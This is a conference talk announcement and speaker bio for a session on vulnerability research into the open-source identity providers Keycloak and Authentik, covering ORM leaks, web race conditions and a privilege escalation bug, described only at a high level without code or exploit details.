Talk

Your Identity is Mine: Techniques and Insights from OS Identity Providers Research

March 14, 16:00 (CAMPUS)

Have you ever been excited to use a brand-new identity provider? Maybe an open-source one that offers cost-effective and flexible solution? These systems can greatly enhance your organization’s productivity. So far, so good, but what happens if an attacker compromises your identity provider?

In this session, we will outline our research process on two popular open-source IdPs: Keycloak and Authentik, followed by finding 0-day bugs (CVE-2024-42490, CVE-2024-37905)

We will dive into two new research techniques: ORM Leaks and web race conditions, delving into these internals.
Then we will share the story of how an information leak prompted further investigation, leading to the discovery of the ORM Leak technique. Attendees will learn how to use these new techniques on their own research.

Lastly, we will overview a privilege escalation vulnerability in Authentik where any user can gain full control of the system! and from there; the sky is the limit (or control over your organization’s assets and applications)

Speaker

Maor Abutbul

Maor Abutbul is a Vulnerability Researcher at CyberArk Labs with about 20 years of experience in the Network & Security fields.

Loves constantly evolving, playing CTFs and implementing learned methods in his research.

Prior to joining CyberArk, Maor worked as a senior security researcher at CYMOTIVE Technologies where he led and conducted security research projects for various automotive vendors.

In addition, Maor possesses an engineering degree and a master's degree in communication systems engineering from Ben-Gurion University of the Negev.

You can reach him on LinkedIn